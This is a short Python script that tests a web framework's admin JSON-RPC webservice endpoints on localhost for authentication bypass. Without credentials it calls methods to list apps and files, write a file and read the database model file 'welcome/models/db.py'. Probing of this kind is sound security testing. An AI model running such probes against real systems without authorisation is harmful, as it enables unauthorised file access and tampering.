#!/usr/bin/env python3
"""
Test admin webservices endpoints for authentication bypass
"""

import requests
import json
import base64

BASE_URL = "https://localhost:5000"

def test_jsonrpc(method, params=None):
    """Test a JSONRPC method"""
    if params is None:
        params = []
    
    payload = {
        "jsonrpc": "2.0",
        "method": method,
        "params": params,
        "id": 1
    }
    
    url = f"{BASE_URL}/admin/webservices/call/jsonrpc"
    headers = {
        "Content-Type": "application/json"
    }
    
    try:
        response = requests.post(url, json=payload, headers=headers, verify=False, timeout=5)
        print(f"\n[*] Testing {method}")
        print(f"    Status: {response.status_code}")
        print(f"    Response: {response.text[:200]}")
        return response
    except Exception as e:
        print(f"\n[*] Testing {method}")
        print(f"    Error: {e}")
        return None

print("=" * 60)
print("Testing Admin Webservices Endpoints")
print("=" * 60)

# Test if endpoints are accessible without auth
test_jsonrpc("login")
test_jsonrpc("list_apps")
test_jsonrpc("list_files", ["welcome"])

# Try to write a file (should fail if auth required)
test_content = "# test file\nprint('hello')"
test_jsonrpc("write_file", ["test.txt", test_content, False])

# Try read_file to see if we can read sensitive files
test_jsonrpc("read_file", ["welcome/models/db.py", False])

print("\n" + "=" * 60)